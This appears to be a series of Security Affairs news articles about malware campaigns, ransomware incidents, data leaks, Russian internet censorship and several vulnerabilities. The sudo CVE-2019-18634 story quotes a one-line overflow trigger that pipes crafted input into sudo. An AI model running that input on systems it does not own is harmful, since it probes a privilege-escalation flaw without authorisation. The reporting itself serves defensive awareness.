The arsenal of attackers includes data stealers, cryptocurrency miners, and ransomware, that literally hit victims from all sides.

Cybereason is following an active campaign to deliver an arsenal of malware that is able to steal data, mine for cryptocurrency, and deliver ransomware to victims all over the world. Due to the variety of malware types deployed in this attack, attackers are able to hit victims from all sides and do not have to limit themselves to one attack goal or another.” reads the analysis published by Cyberreason. “The payloads observed in this campaign originated from different accounts in code repository platform Bitbucket, which was abused as part of the attackers delivery infrastructure.”

Attackers abuse legitimate online storage platforms to bypass security products due to the trust given to legitimate online services. The use of online storage platform also allows attackers to reduce the exposure to their C2 server infrastructure by separating the delivery infrastructure (online storage platforms) from the C2 server infrastructure.

The attackers are hosting malware on several Bitbucket accounts, the malicious codes receive frequent updates. Cybereason discovered the following payloads actively deployed in this campaign:

  • PredatorPredator is an information stealer that steals credentials from browsers, uses the camera to take pictures, takes screenshots, and steals cryptocurrency wallets.
  • AzorultAzorult is an information stealer that steals passwords, email credentials, cookies, browser history, IDs, cryptocurrencies, and has backdoor capabilities.
  • Evasive Monero Miner: The Evasive Monero Miner is the dropper for a multi-stage XMRig Miner that uses advanced evasion techniques to mine Monero and stay under the radar.
  • STOP RansomwareThe STOP Ransomware is used to ransom the file system and is based on an open source ransomware platform. It also has downloader capabilities that it uses to infect the system with additional malware.
  • Vidar: Vidar is an information stealer that steals web browser cookies and history, digital wallets, two-factor authentication data, and takes screenshots.
  • Amadey bot: Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information on a target machine.
  • IntelRapid: IntelRapid is a cryptocurrency stealer that steals different types of cryptocurrency wallets.

Attackers are using Themida as a packer to evade detection and the CypherIT Autoit packer to pack Azorult and attempt to protect it from the analysis

The usage of multiple payloads on a single system allows attackers to maximize their efforts, especially when the infected systems belong to a corporate network.

The attackers camouflage the malware with bogus cracked versions of commercial software, “Adobe Photoshop, Microsoft Office, and others.”

Most of the tainted crackers observed in this campaign include Azorult and Predator the Thief data stealers.

Experts discovered some Bitbucket repositories linked to each other hosting the same piece of malware with the same names, the operators behind this campaign in some cases provided updates as often as three hours.

“Through research of other samples related to the campaign, we have identified additional Bitbucket repositories that are likely created by the same threat actor with the same set of malware samples.” continues the report. “Judging by the number of downloads, we estimate over 500,000 machines have been infected by the campaign so far, with hundreds of machines affected every hour. ”

More than 500,000 machines have been infected already compromised, experts observed hundreds of new infections every hour.

Experts noticed that when there is nothing to steal from the infected system, attackers deploy the STOP ransomware to blackmail the victims and maintain persistence.

“Attackers continue to evolve and look for more effective ways to make a profit. They are finding that, when their tools fail, they can use legitimate ones instead. Security practitioners must find ways to evolve faster and ensure the security of these trusted resources so we can stay ahead of these threats.” concludes the report that also includes Indicators of Compromise (IoCs).

Pierluigi Paganini

(SecurityAffairs – bitbucket, hacking)

The post Hackers abuse BitBucket to infect 500K+ hosts with arsenal of malware appeared first on Security Affairs.

Google mistakenly shared private videos of some users with others in 2019

Google has accidentally shared private videos of some users that were stored on its servers with other, the tech giant notified impacted users.

Google admitted a new privacy incident, it has accidentally shared private videos saved on its servers with other users. At the time it is not clear the number of impacted users, anyway, the company sent them a security notification. The company only confirmed that “one or more videos in your Google Photos account was affected by this issue.”

The incident was caused by a technical issue in Google’s Takeout that is a project that allows users of its products, such as YouTube and Gmail, to export their data to a downloadable archive file.

The issue was confirmed by the researcher Jon Oberheide from Duo Security that published a Tweet that confirms some videos saved in Google Photos were exported to unrelated user’s archives.

The technical issue remained active between 21st November and 25th November 2019.

The privacy incident potentially affected those users who used Google Takeout service in the period mentioned above. The tech giant pointed out that the problem did not involve photographs uploaded by the users to Google Photos.

The company apologized for any inconvenience the incident may have caused, users can contact its Support service for further assistance.

Pierluigi Paganini

(SecurityAffairs – privacy, data leak)

The post Google mistakenly shared private videos of some users with others in 2019 appeared first on Security Affairs.

Facebook fixed a WhatsApp bug that allowed hackers to access local file system

Facebook addressed a critical issue in WhatsApp that would have allowed attackers to read files from a user’s local file system, on macOS and Windows.

Facebook has addressed a critical vulnerability in WhatsApp, tracked as CVE-2019-18426, that would have allowed hackers to read files from a user’s local file system, on macOS and Windows systems.

“A vulnerability in WhatsApp Desktop when paired with WhatsApp for iPhone allows cross-site scripting and local file reading. Exploiting the vulnerability requires the victim to click a link preview from a specially crafted text message.” reads the security advisory published by Facebook.

The issue could be exploited by a remote attacker by tricking the victims into clicking a link preview from a specially crafted text message.

The CVE-2019-18426 flaw affects WhatsApp Desktop prior to v0.3.9309 paired with WhatsApp for iPhone versions prior to 2.20.1.: 01-21-2020

The vulnerability received an 8.2 high severity CVSS 3.x base score, it was discovered by Gal Weizman from PerimeterX.

Weizman discovered a gap in WhatsApp’s Content Security Policy (CSP) that allowed for cross-site scripting (XSS) on the desktop app, further analysis allowed the expert to gain read permissions on the local file system on both Windows and macOS WhatsApp desktop apps.

“if you run an old version of a vulnerable app, one can exploit that vulnerability and do bad things to you.” wrote the expert.

“I did however demonstrated how I use fetch() API, for example, to read files from the local OS like the content of C:\Windows\System32\drivers\etc\hosts file in this case,”

whatsapp flaw

The flaw could have allowed attackers to inject malicious code and links within messages sent that would be completely transparent to the victims.

Pierluigi Paganini

(SecurityAffairs – United Nations, hacking)

The post Facebook fixed a WhatsApp bug that allowed hackers to access local file system appeared first on Security Affairs.

Using 99 mobile phones to create a fake traffic jam in Google Maps

A German artist demonstrated how using a simple trick it is possible to deceive Google Maps and create a virtual traffic jam.

The German artist Simon Weckert conducted a simple experiment to demonstrate how to deceive Google Maps and create a virtual traffic jam.

The man put 99 cell mobile phones using Google Maps in a hand cart and started walking around the streets of Berlin.

Google Maps
Google Maps

The popular Maps service leverages users’ GPS and location data sent by the from mobile devices to determine the routes for its users and avoid traffic congestion on a particular point of the path. Using data sent by the mobile devices Google Maps detects traffic jams and suggests alternative routes to the destination.

In Weckert’s test, the man was walking with 99 active phones simulating the presence of traffic on his route that was interpreted by the service as 99 cars going slow due to the traffic jam.

This simple test demonstrates that is is quite simple to interfere with the map service. Such kind of attack could have serious effects on traffic and could be used by attackers to reroute vehicles through specifically chosen routes.

“99 second hand smartphones are transported in a handcart to generate virtual traffic jam in Google Maps. Through this activity, it is possible to turn a green street red which has an impact in the physical world by navigating cars on another route to avoid being stuck in traffic,” Weckert wrote on his web site.

Pierluigi Paganini

(SecurityAffairs – Google, hacking)

The post Using 99 mobile phones to create a fake traffic jam in Google Maps appeared first on Security Affairs.

The city of Racine was offline following a ransomware attack

The city of Racine joins to the long string of US municipalities that were hit with ransomware attack, it was forced offline following the infection.

The city of Racine, Wisconsin, was hit with a ransomware, the incident took place on January 31, 2020. Most of non-emergency computer services of the city went offline following the attack.

“City of Racine computer systems were infected by ransomware early Friday morning, and remained that way late Sunday afternoon.” reported the GovernmentTechnology website.

“The city website, its email system and online payment collection were all affected and were still down over the weekend. Racine Police were unable to process fee payments or provide copies of police or accident reports, according to a Racine Police Facebook post.”

The city’s website, the email and online payment collection systems were still offline at the time of writing. The police are unable to processes fee payments or provide copies of police and accident reports.

On Friday, the city’s Management Information Systems department worked to determine the extent of the infection implemented the incident response procedures.

Local authorities and feds have launched an investigation into the incident.

The tax collection, 911 and public safety systems were not impacted by the ransomware attack.

“MIS worked over the weekend with the city’s cybersecurity insurer “to develop a detailed plan to restore and recover systems without spreading the ransomware,” according to a statement from Powell.

“We are also conducting an investigation into the cause and scope of the investigation, including whether any data housed by the City or acquired by the ransomware actor,” Powell said in a statement Saturday evening.

In December, Maze ransomware operators have released 2GB of files that were allegedly stolen from the City of Pensacola during the recent attack.

In November 2019, the state government of Louisiana was hit with a ransomware attack that affected multiple state services including the Office of Motor Vehicles, the Department of Health, and the Department of Transportion and Development.

The incident forced the state of government of Louisiana to shut down several numerous web sites of the state as well as email and Internet services.

In recent months other municipalities were hit by ransomware attacks, in August at least 23 local government organizations were impacted by the ransomware attacks.

Some cities in Florida were victims of hackers, including Key Biscayne, Riviera Beach and Lake City.

In June, the Riviera Beach City agreed to pay $600,000 in ransom to decrypt its data after a ransomware-based attack hit its computer system. A few days later, Lake City also agreed to pay nearly $500,000 in ransom after a ransomware attack.

In July 2018, another Palm Beach suburb, Palm Springs, decided to pay a ransom, but it was not able to completely recover all its data.

In March 2019, computers of Jackson County, Georgia, were infected with ransomware that paralyzed the government activity until officials decided to pay a $400,000 ransom to decrypt the files.

Pierluigi Paganini

(SecurityAffairs – City of Racine, hacking)

The post The city of Racine was offline following a ransomware attack appeared first on Security Affairs.

Toll Group shuts down some online systems after ransomware attack

The Australian transportation and logistics giant Toll Group has suffered a ransomware attack that forced it to shut down part of its services.

The Australian transportation and logistics giant Toll Group was victim of a ransomware attack, in response to the incident the company has shut down some of its online services.

The Toll Group is an Australian transportation and logistics company with operations in road, rail, sea, air, and warehousing, it is a subsidiary of Japan Post Holdings and has over 44,000 employees.

The attack was discovered on January 31 when the internal staff detected a piece of ransomware on its systems. In order to mitigate the threat, the personnel isolated some systems to avoid malware propagation and potential data.

The company published a security breach notice on its website the same day, but it provided further details some days later.

“As a result of our decision to disable certain systems following a recent cyber security threat, we’re continuing to meet the needs of many of our customers through a combination of manual and automated processes across our global operations, although some are experiencing delay or disruption. For our parcels customers, all of our processing centres are continuing to operate including pick up, processing and dispatch albeit at reduced speed in some cases.” reads a data breach notification published by the company on its website.

“We can confirm the cyber security incident is due to a targeted ransomware attack which led to our decision to immediately isolate and disable some systems in order to limit the spread of the attack.”

The company declared that it has seen no evidence to suggest any personal data has been exfiltrated. The Toll Group has reported the incident to the authorities, an investigation is still ongoing.

While the systems were off-line, the customers were not able to track their shipments.

The company confirmed that the attack was targeted, but at the time it is unclear what ransomware family infected the systems at the Toll Group.

Toll Group is currently working on restoring affected systems, it is only accepting orders via phone.

“We’re working with relevant authorities and have referred the matter to the appropriate bodies for criminal investigation. In the meantime, we’ll continue to work to our current processes in order to meet the needs of our customers.” continues the company.

“For our parcels customers, all of our processing centres are continuing to operate including pick up, processing and dispatch albeit at reduced speed in some cases,” “Most other Toll operations are continuing to operate on manual systems based on our business continuity plans.”

Pierluigi Paganini

(SecurityAffairs – Toll Group, hacking)

The post Toll Group shuts down some online systems after ransomware attack appeared first on Security Affairs.

Hackers abused Twitter API to match usernames to phone numbers

Twitter discloses a security incident involving third-parties that exploited its official API to match phone numbers with Twitter usernames.

On December 24, 2019 the company discovered that its API were exploited by a large network of fake accounts to match Twitter usernames to phone numbers. The company immediately suspended the involved accounts.

“On December 24, 2019 we became aware that someone was using a large network of fake accounts to exploit our API and match usernames to phone numbers. We immediately suspended these accounts” reads the statement published by Twitter.

“During our investigation, we discovered additional accounts that we believe may have been exploiting this same API endpoint beyond its intended use case.”

Twitter was informed of the abuse of Twitter API following a report from TechCrunch site. The post published by TechCrunch detailed how the security researchers Ibrahim Balic abused a Twitter API to match 17 million phone numbers to public usernames.

Balic provided TechCrunch with a sample of the phone numbers he successfully matched, in one case, TechCrunch was able to identify a senior Israeli politician using their matched phone number.

Twitter investigated the issue and discovered that the accounts involved in the incident were from a wide range of countries, the experts discovered that a high volume of requests was coming from IP addresses located within Iran, Israel, and Malaysia. 

Twitter speculates that it is possible that some of these IP addresses may have links to nation-state actors.

Twitter confirmed that the security incident only impacted Twitter users who enabled an option in their settings section to allow phone number-based matching.

“When used as intended, this endpoint makes it easier for new account holders to find people they may already know on Twitter. The endpoint matches phone numbers to Twitter accounts for those people who have enabled the “Let people who have your phone number find you on Twitter” option and who have a phone number associated with their Twitter account.” continues Twitter.

“People who did not have this setting enabled or do not have a phone number associated with their account were not exposed by this vulnerability,”

Twitter immediately implemented a number of changes to this endpoint to avoid future abuse of the API.

Pierluigi Paganini

(SecurityAffairs – Twitter API, hacking)

The post Hackers abused Twitter API to match usernames to phone numbers appeared first on Security Affairs.

NCA arrested six men in UK over Malta Bank Cyber-Heist

Last week NCA arrested six individuals in the United Kingdom because they are suspected to be involved in a Malta cyber-heist and money laundering operation.

Britain’s National Crime Agency (NCA) arrested six individuals in the United Kingdom because they are accused to be involved in a cyber-heist of a Malta bank and money laundering operation.

The individuals are accused to be involved in the attack against the Bank of Valletta that took place in February 2019.

Bank of Valletta is the largest bank in Malta that accounts for almost half of banking transactions in the country, it had to shut down its operations in February after hackers attempted to withdraw 13 million euros ($14.7 million).

The news was confirmed by Prime Minister Joseph Muscat, hackers broke into the systems of the bank and transfer the funds overseas.
Muscat told parliament that threat actors attempted to transfer funds to banks in the Czech Republic, Hong Kong, Britain, and the US.

The attackers used a network of accounts to receive those funds, one of which was in Belfast. According to the NCA, crooks transferred roughly £800,000 (~$1.04 million) in the account in Belfast.

“Around £800,000 was illegally transferred into an account in Belfast, which then saw payments of more than £340,000 go out before the account could be blocked.” reads the press release published by the NCA.

“The money was spent at high end stores such as Harrods and Selfridges, to buy Rolex watches at a store in London, and on payments for a Jaguar and Audi A5 from a car dealership.”

The suspects were able to perform card payments and cash withdrawals of £340,000 (~$442,700) from the accounts, but once the authorities discovered the fraudulent activities it has blocked them.

The individuals used part of the money to make purchases at high-end stores such as Harrods and Selfridges in London, they bought Rolex watches for around £110,000 (~$143,000) at a store in London, and also made payments for a Jaguar and Audi A5 from a car dealership.

The NCA arrested two males (aged 22 and 17) on January 22, 2020, in the West Hampstead and Ladbroke Grove areas of London, the authorities also interviewed a third person.

On January 30, the NCA officers, along with officers from the PSNI, executed two warrants in the north and west Belfast areas and arrested a man (39) on suspicion of money laundering offences, fraud, and theft.

On January 31, two other males, aged 23 and 24, on suspicion of money laundering offences, fraud, and theft, the authorities handed them into a police station in Belfast. The police arrested another man, aged 33, at Heathrow Airport where he returned to the UK from China.

“Our 12-month investigation, carried out with the help of the Malta Police Force Economic Crime Unit, has focused on a number of individuals we suspect may have been involved in laundering money on behalf of the organized crime group who carried out the cyber-attack,” NCA Belfast branch commander David Cunningham said.

“This has led us to the arrests in London last week and Belfast today, and our investigation continues.”

“This operation demonstrates the reach of the NCA, both domestically and internationally.”

“Working with our law enforcement partners at home and overseas we are determined to do all we can to target and disrupt those involved in organised crime, here in Northern Ireland and across the rest of the UK.”

Pierluigi Paganini

(SecurityAffairs – Malta cyber-heist, hacking)

The post NCA arrested six men in UK over Malta Bank Cyber-Heist appeared first on Security Affairs.

Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root

Apple researcher discovered an important vulnerability (CVE-2019-18634) in ‘sudo’ utility that allows non-privileged Linux and macOS users to run commands as Root.

Security expert Joe Vennix from Apple has discovered an important vulnerability in ‘sudo‘ utility, tracked as CVE-2019-18634, that allows non-privileged Linux and macOS users to run commands as Root.

The issue could be exploited only under a specific configuration

Sudo is one of the most important, powerful, and commonly used utilities that comes as a core command pre-installed on macOS and almost every UNIX or Linux-based operating system.

sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of sudo were designed to run commands only as the superuser.

A stack-based buffer overflow issue that resides in Sudo versions before 1.8.26 it the root cause of the privilege escalation vulnerability.

The vulnerability could be exploited only when the “pwfeedback” option is enabled in the sudoers configuration file. The Sudo’s pwfeedback option allows providing visual feedback when the user is inputting their password.

“In Sudo before 1.8.26, if pwfeedback is enabled in /etc/sudoers, users can trigger a stack-based buffer overflow in the privileged sudo process. (pwfeedback is a default setting in Linux Mint and elementary OS; however, it is NOT the default for upstream and many other packages, and would exist only if enabled by an administrator.)” reads the description published by the NIST. “The attacker needs to deliver a long string to the stdin of getln() in tgetpass.c.”

The expert pointed out that this vulnerability can be triggered even by users not listed in the sudoers file.

“Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled.” wrote Sudo developer Todd C. Miller.

“The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password. For example:

    $ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
    Password: Segmentation fault

There are two flaws that contribute to this vulnerability:

  • The pwfeedback option is not ignored, as it should be, when reading from something other than a terminal device. Due to the lack of a terminal, the saved version of the line erase character remains at its initialized value of 0.
  • The code that erases the line of asterisks does not properly reset the buffer position if there is a write error, but it does reset the remaining buffer length. As a result, the getln() function can write past the end of the buffer.”

Users can determine if they are affected by the flaw by running “sudo -l” command on their Linux or macOS terminal, it this way it is possible to check if the “pwfeedback” option is enabled and listed in the “Matching Defaults entries” output.

In case the option is enabled, it is possible to disable it by changing “Defaults pwfeedback” to “Defaults !pwfeedback” in the sudoers configuration file.

Sudo Maintainers addressed the flaw with the release of sudo version 1.8.31.

“While the logic bug is also present in sudo versions 1.8.26 through 1.8.30 it is not exploitable due to a change in EOF handling introduced in sudo 1.8.26,” Miller explained.

In October 2019, Vennix discovered a security policy bypass issue in the Sudo utility that could be exploited by an ill-intentioned user or a malicious program to execute arbitrary commands as root on a targeted Linux system, even if the “sudoers configuration” disallows the root access.

Pierluigi Paganini

(SecurityAffairs – CVE-2019-18634, hacking)

The post Sudo CVE-2019-18634 flaw allows Non-Privileged Linux and macOS Users run commands as Root appeared first on Security Affairs.

Police are warning crooks are using cleaners to compromise businesses

Cybercriminals are planting so-called “sleepers” in cleaning companies so that they can physically access IT infrastructure and hack them.

The alert was launched by a senior police officer, cyber criminals are planting so-called “sleepers” in cleaning companies so that they can gau physical access IT infrastructure and hack them. The police are urging organizations to bolster their physical security processes. Cleaners could allow attackers to bypass physical measures and once inside the target organizations they could hack internal systems and move laterally.

“Exploitation of staff is a key area” “Organised crime groups are planting ‘sleepers’ in cleaning companies that a procurement team may look at bidding for. There’s no way of auditing their vetting. They’ll also using people in painting and decorating firms; anyone who has out-of-hours access to a building is fair game.” Shelton Newsham, who manages the Yorkshire and Humber Regional Cyber Crime Team, told an audience at the SINET security event. “Even the old ‘drop a USB stick’ is back.”

“There are small steps businesses can make: we’re changing our visitor passes: until three weeks ago they were red, like our brand. Now they’re black and we encourage staff to be more suspicious of who’s walking around.” Santander’s UK CISO/Director of Security & Privacy Services, Emma Leith told Computer Business Review. “Regular red teaming and purple teaming; capture the flag exercises [all help]”, biometrics too, although there’s no point having cutting edge systems running on an old Windows server.”

The only way to prevent this kind of physical intrusions that exploit human factor and social engineering is to implement a cultural change.

Emma Leith stressed the importance of security awareness and the importance of regular training for internal personnel.

Pierluigi Paganini

(SecurityAffairs – physical access, cleaners)

The post Police are warning crooks are using cleaners to compromise businesses appeared first on Security Affairs.

Ransomware brought down services of popular TV search engine TVEyes

TVEyes was brought down after its core server and engineering workstations were infected with a ransomware attack, company CEO confirmed.

TVEyes is a company that manages a popular platform for monitoring TV and radio news broadcasts, it is used worldwide by PR agencies and newsrooms.

On Thursday night, a ransomware attack hit the company network causing an outage of its multimedia messaging and data feed services (i.e. TVEyes Media Monitoring Suite (MMS)).

TVEyes reported the incident to its customers by email, one Tweet sent by the company to Medium Buying explained that the root cause of the outage was a ransomware infection.

“We are rebuilding the core system on fresh hardware, and expect to have TVEyes back online soon, but do not have an exact ETA for services to be restored,” the email says. “As you can imagine, TVEyes engineers are working nonstop and will continue to do so until we are back up and running.”

CEO David Ives confirmed that the company did not pay the ransom and that the internal staff restored from backups after sanitized the impacted systems.

“All the engineers have been working on this since early yesterday morning, and there’s no evidence that was downloaded,” said TVEyes CEO David Ives.

“Ives said in an interview. “It appears it was purely an attack to make money.” 

At the time of writing, the company has not yet identified the ransomware family that infected its systems.

Another unknown aspect of the attack is that at the time it is not clear if the hackers have exfiltrated information from the company.

The company CEO added that the attack didn’t appear to be the result of a cyber espionage campaign aimed at stealing data on political candidates.

Pierluigi Paganini

(SecurityAffairs – TVEyes, hacking)

The post Ransomware brought down services of popular TV search engine TVEyes appeared first on Security Affairs.

Attackers are hacking NSC Linear eMerge E3 building access systems to launch DDoS attacks

Hackers have already compromised more than 2,300 Linear eMerge E3 building access systems exploiting a severe vulnerability that has yet to be fixed.

Linear eMerge E3 smart building access systems designed by Nortek Security & Control (NSC) are affected by a severe vulnerability (CVE-2019-7256) that has yet to be fixed and attackers are actively scanning the internet for vulnerable devices.

Researchers from SonicWall revealed that hackers are attempting to compromise Linear eMerge E3 smart building access systems to recruit them in a DDoS botnet.

The Linear E3 devices are installed in commercial, industrial, banking, medical, retail, hospitality, and other businesses to secure their facilities and manage access to personnel.

In May 2019, security researcher Gjoko Krstic from Applied Risk discovered over 100 vulnerabilities in management and access control systems from four major vendors, including Nortek.

An attacker can exploit the vulnerabilities to gain full control of the vulnerable products and access to the devices connected to them.

Krstic conducted a year-long study on building management (BMS), building automation (BAS) and access control products from Nortek, Prima Systems, Optergy, and Computrols. The experts analyzed several products, including Computrols CBAS-Web, Optergy Proton/Enterprise, Prima FlexAir, and of course two Nortek Linear eMerge products.

Krstic found several types of flaws, including default and hardcoded credentials, command injection, cross-site scripting (XSS), path traversal, unrestricted file upload, privilege escalation, authorization bypass, clear-text storage of passwords, cross-site request forgery (CSRF), arbitrary code execution, authentication bypass, information disclosure, open redirect, user enumeration, and backdoors.

Attackers can easily obtain default passwords and identify internet-connected target systems. Passwords can be found in product documentation and compiled lists available on the Internet.” reads the advisory published by Applied Risk. “It is possible to identify exposed systems using search engines like Shodan, and it is feasible to scan the entire IPv4 internet. Applied Risk has calculated a CVSSv3 score of 9.8 for this vulnerability”

In November, Applied Risk released a proof-of-concept exploit code for the CVE-2019-7256 flaw along with a Metasploit module that exploits a command injection vulnerability in the Linear eMerge E3 Access Controller.

According to a report recently published by SonicWall, hackers are scanning the Internet for NSC Linear eMerge E3 devices to exploit the CVE-2019-7256 flaw. The experts warn that the vulnerability is very easy to exploit, attackers are triggering it via a specially crafted HTTP request that is sent to vulnerable systems.

SonicWall Capture Labs Threat Research team observe huge hits on our firewalls that attempt to exploit the command injection vulnerability with the below HTTP request.” reads the advisory published by SonicWall.

“Once the vulnerability is exploited successfully on the target, the following shell commands will be executed on the target system:

The above shell commands are used to download the malware and execute it on the exploited systems.”

Threat actors are compromising the access control systems using the CVE-2019-7256 flaw and install a DDoS bot, the malicious activity was first reported on January 9 by Bad Packets.

“As per Applied Risk’s research report, a total number of 2,375 Internet-accessible eMerge devices are listed by the Shodan search engine; 600 for eMerge50P and 1775 for eMerge E3.” continues SonicWall.

“Attackers seem to be actively targeting these devices as we see tens of thousands of hits every day, targeting over 100 countries with the most [attacks being] observed in U.S.,”.

The hackers are actively targeting devices exposed online that are located in over 100 countries, most of them in the U.S.

Experts recommend to disconnect the vulnerable NSC Linear eMerge E3 devices from the internet or limiting the access to them.

Pierluigi Paganini

(SecurityAffairs – NSC Linear eMerge E3, hacking)

The post Attackers are hacking NSC Linear eMerge E3 building access systems to launch DDoS attacks appeared first on Security Affairs.

Apollon Darknet market is allegedly pulling an exit scam

The Apollon market, one of the largest marketplaces, is likely exit scamming after the administrators have locked vendors’ accounts.

The Apollon market, one of the darknet’s largest marketplaces, is likely exit scamming, vendors and customers reported suspicious behavior of its administrators.

Users on Reddit are reporting that vendors can’t withdrawal funds nor sign into their account, only buyers are still able to sign onto their accounts.

Apollon (http://apollonujscjrlng.onion) is a classic escrow market founded in March 2018 with a total listing of more 54,000 items as of January 2020.

apollon

On January 28, just after the Dread (a Reddit-style forum on the deep web), an attacker started launching massive DDoS attacks against the Dread, Envoy, The Hub, and other forums. Many black markets were taken down and access to their platforms has been limited. The administrator of the Dread market speculates that Apollon is responsible for “the attacks against all the forums and Empire.”

Which is the connection between Apollon and Dread?

Experts noticed that this is the third market that has exit scammed while Dread was offline for weeks. revealed last year that the Apollon market is owned by a group called Hugbunter, which owns other black markets, including the Avaris Market, the Whitehouse Market, the Versus Market, the Cannahome & Monoply Market.

Every time Dread is offline, a market exit scams, and it isn’t a coincidence because one of their owned markets shut down.

Everytime dread is offline, a market exit scams. It isn’t just a random market that goes offline, its their owned market that exit scams, thats because people can’t report the exit scam in its early stage to avoid getting less than expected returns.” continues Darknetstats.

“Since the downtime we’ve had some reports of problems with Apollon.” wrote SamWhiskey, one of the Dread moderators. “Apollon market is paying for DDOS attacks against dread, avengers, the hub, envoy and empire. Most likely to cover up an exit scam.”

Some vendors on Apollon Market reported their problems in using the platform Darknetlive.

“I can confirm that when I try to sign into Apollon I get the following: The username and/or password you entered is invalid.” reported the vendor SteroidWarehouse. “This morning I could still login and then all of a sudden I couldn’t. I also had several customers who told me that their wallets have been depleted yesterday night and this morning. It might be that they’re doing a Nightmare style exist scam. If you need more details please let me know.”

The news of a possible Apollon exit scam was also reported by the Darknetstats website.

“The second largest darknet market is in the midst of an exit scam according to multiple sources that have confirmed the reports to us. Over the past week we received several reports of users deposits not getting added to their accounts and today they locked all vendor accounts which leads to the conclusion that they are now actively scamming users of their funds.” reads a post published on the Darknetstats website.

“The conclusion is clear. We will see a powerful shilling in favor of Avaris Market and everyone will be asked to join Avaris (and whitehouse too) on Dread. The accounts that will do the shilling can be easily identified by experts but new users will definitely fall for this trap and will join this market and get scammed again. Our advice will be to stay away at all costs from the markets mentioned above.”

Pierluigi Paganini

(SecurityAffairs – Apollon Market, exit scam)

The post Apollon Darknet market is allegedly pulling an exit scam appeared first on Security Affairs.

Russia’s watchdog Roskomnadzor threatens to fine Twitter and Facebook

Russia’s Roskomnadzor watchdog wants to fine Facebook and Twitter after they refused to store data of Russian users on servers located in the country.

Russia’s telecommunications watchdog Roskomnadzor has instituted administrative proceedings against Facebook and Twitter after they refused to store data of Russian users on servers located in the country.

“On January 31, 2020, Roskomnadzor instituted administrative proceedings against Facebook, Inc and Twitter, Inc ,. These companies did not provide information on meeting the requirements for localizing the databases of Russian users of the corresponding social networks on servers located in the Russian Federation, as provided for in part 5 of Article 18 of the Law on Personal Data No. 152-FZ.” states the press release published by the Russian watchdog. “Administrative proceedings were instituted on the grounds of an administrative offense in accordance with part 8 of article 13.11. Administrative Code of the Russian Federation, which provides for an administrative fine in the amount of 1 million to 6 million rubles.”

Russia’s Roskomnadzor revealed that the proceedings protocol was signed in the presence of a representative of Twitter, while no Facebook representative was present to sign it. Anyway, Facebook will receive a copy of the Protocol within three days.

Both companies could be condemned to pay a fine ranging between 1 million rubles (approximately $16,000) and 6 million rubles ($94,000).

“You can bypass bans, but if the company works [in Russia], it’ll have to pay,” Deputy Communications Minister Alexei Volin told the state-run TASS news agency Thursday.

The Russian government has already blocked the professional social network LinkedIn in 2016 under the data-localization legislation.

This week the Russian government has blocked the ProtonMail end-to-end encrypted email service and ProtonVPN VPN service.

Roskomnadzor explained that the services were abused by cybercriminals and that Proton Technologies refused to register them with state authorities. The Russian government asks all Internet service providers and VPN providers operating in the country to provide information about their users.

“On January 29, based on the requirements of the General Prosecutor’s Office of the Russian Federation, Roskomnadzor will restrict access to the mail service Protonmail.com (Switzerland),” reads a press release published by Roskomnadzor, the Russia’s telecommunications watchdog.

“This email service was used by cybercriminals both in 2019 and especially actively in January 2020 to send false messages under the guise of reliable information about mass mining of objects in the Russian Federation,” 

Roskomnadzor decided to block the Proton Technologies after the company refused to provide information about the owners of the mailboxes used to send the bombing threats.

Pierluigi Paganini

(SecurityAffairs – United Nations, hacking)

The post Russia’s watchdog Roskomnadzor threatens to fine Twitter and Facebook appeared first on Security Affairs.

The Russian Government blocked ProtonMail and ProtonVPN

The popular ProtonMail end-to-end encrypted email service and ProtonVPN VPN service have been blocked by the Russian government this week.

This week the Russian government has blocked the ProtonMail end-to-end encrypted email service and ProtonVPN VPN service.

Roskomnadzor explained that the services were abused by cybercriminals and that Proton Technologies refused to register them with state authorities. The Russian government asks all Internet service providers and VPN providers operating in the country to provide information about their users.

“On January 29, based on the requirements of the General Prosecutor’s Office of the Russian Federation, Roskomnadzor will restrict access to the mail service Protonmail.com (Switzerland),” reads a press release published by Roskomnadzor, the Russia’s telecommunications watchdog.

“This email service was used by cybercriminals both in 2019 and especially actively in January 2020 to send false messages under the guise of reliable information about mass mining of objects in the Russian Federation,” 

Roskomnadzor decided to block the Proton Technologies after the company refused to provide information about the owners of the mailboxes used to send the bombing threats.

“The company responded with a categorical refusal to Roskomnadzor’s repeated requests for information to be included in the register of information dissemination organizers on the Internet. Information about the administrators of the mailboxes used to send threats has not been provided.” continues the Russian Watchdog.

“In accordance with the procedure enshrined in the legislation, Roskomnadzor consistently restricts access to resources used by criminals to destabilize the situation in the country and increase tension, and expects effective interaction with all parties involved.”

Proton Technologies confirmed that their services have been blocked in Russia and recommends using the Tor network to bypass the censorship.

“We have received reports that Proton is currently blocked in Russia. We are reaching out to the appropriate authorities to get the block lifted as soon as possible. This block affects ProtonMail and ProtonVPN users who were not logged in before the block was implemented.” states Proton Technologies. “For now, we recommend using the TOR network (via the TOR Browser) to access our services.

To quickly access the Proton websites with the TOR browser:

  1. Download the TOR browser for your device here: https://www.torproject.org/download/
  2. Install the TOR browser
  3. Once the browser is installed, launch it and you will be able to access the Proton websites”

ProtonMail condemned the choice of the Russian Government to block its services.

Pierluigi Paganini

(SecurityAffairs – ProtonMail, censorship)

The post The Russian Government blocked ProtonMail and ProtonVPN appeared first on Security Affairs.

Microsoft announces the launch of a bug bounty program for Xbox

Microsoft announced the launch of an Xbox bug bounty program with rewards of up to $20,000 for critical remote code execution flaws.

Microsoft is going to launch an Xbox bug bounty program that will pay rewards of up to $20,000 for critical remote code execution vulnerabilities.

“The Xbox Bounty Program invites gamers, security researchers, and others around the world to help identify security vulnerabilities in the Xbox Live network and services and share them with the Xbox team. Qualified submissions are eligible for bounty rewards of $500 to $20,000 USD.” reads the program description.

“Bounties will be awarded at Microsoft’s discretion based on the severity and impact of the vulnerability and the quality of the submission, and subject to the Microsoft Bounty Terms and Conditions.”

The bug bounty program will pay for vulnerabilities in the Xbox Live network and services. The list of eligible types of vulnerabilities Cross site scripting (XSS), Cross-site request forgery (CSRF), IDOR, insecure, injection, server-side code execution, and significant security misconfiguration (when not caused by user).

The vulnerabilities can lead to remote code execution, elevation of privileges, security bypass, information disclosure, spoofing, or tampering. Denial-of-service (DoS) flaws are out of scope.

